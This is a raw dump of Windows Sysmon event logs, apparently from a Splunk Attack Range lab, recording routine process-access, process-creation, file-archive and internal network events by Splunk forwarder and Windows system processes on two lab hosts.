AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000294383Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:19.698{C8EA50B7-143B-6216-9006-000000003802}55567004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294382Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:19.374{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B7ACFB22381340331559FD6A734132F,SHA256=C4A2FA4C2CBF3CABAEC59B985F8831547E079F90975E4E73B45EC4518AF763A4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294381Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:19.258{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-143B-6216-9006-000000003802}5556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294380Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:19.258{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294379Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:19.258{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294378Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:19.258{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294377Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:19.258{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294376Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:19.258{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-143B-6216-9006-000000003802}5556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294375Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:19.258{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-143B-6216-9006-000000003802}5556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294374Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:19.260{C8EA50B7-143B-6216-9006-000000003802}5556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218663Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:20.955{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB1386C525CFEB29767C547289ABEAD8,SHA256=27231BB124014246FA22384D48403AC97CBB1E6904AAE2C263ADD0E0670D3CF0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294402Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:20.942{C8EA50B7-143C-6216-9206-000000003802}64806500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294401Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:20.489{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-143C-6216-9206-000000003802}6480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294400Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:20.473{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294399Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:20.473{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294398Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:20.473{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294397Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:20.473{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294396Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:20.473{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-143C-6216-9206-000000003802}6480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294395Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:20.473{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-143C-6216-9206-000000003802}6480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294394Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:20.475{C8EA50B7-143C-6216-9206-000000003802}6480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000294393Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:20.427{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B4A0AD4AADDC578A147923B590E0343,SHA256=2D72BD01F273D934691C81EEE0F122C19E437EC7D4879B5DC83AD9BF3F2231AC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294392Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:20.308{C8EA50B7-143B-6216-9106-000000003802}2086708C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000218667Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:21.971{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7B727F62D485E4389EE9DC2C9106CC3,SHA256=E9224AB86CF677C39758AF16D7F7701ECA944970F8562C4B3D44C582742353DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294411Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:21.427{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=267BC3C854C2BB0560BCE45D532EA3CA,SHA256=9A5BD9F82CFB52C59B78598E21B3BC5E88522E407B2B45BD958830C6B300C6F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218666Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:21.924{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E403E00A623D10B9ADE5887598D4F739,SHA256=7A74BFEE50D25B1CECB39E2B41410597E5167BBC12416B1C57182AE87F0686CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218665Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:21.924{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2FB728A808D24B12ACF974DD4BE7EC81,SHA256=FC86272CF3E30ED30390BD638B92E0F27B76800DF029BFF73B4F08E133F417A9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218664Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:18.561{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51476-false10.0.1.12-8000- 10341000x8000000000000000294410Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:21.110{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-143D-6216-9306-000000003802}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294409Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:21.110{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294408Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:21.110{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294407Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:21.110{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294406Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 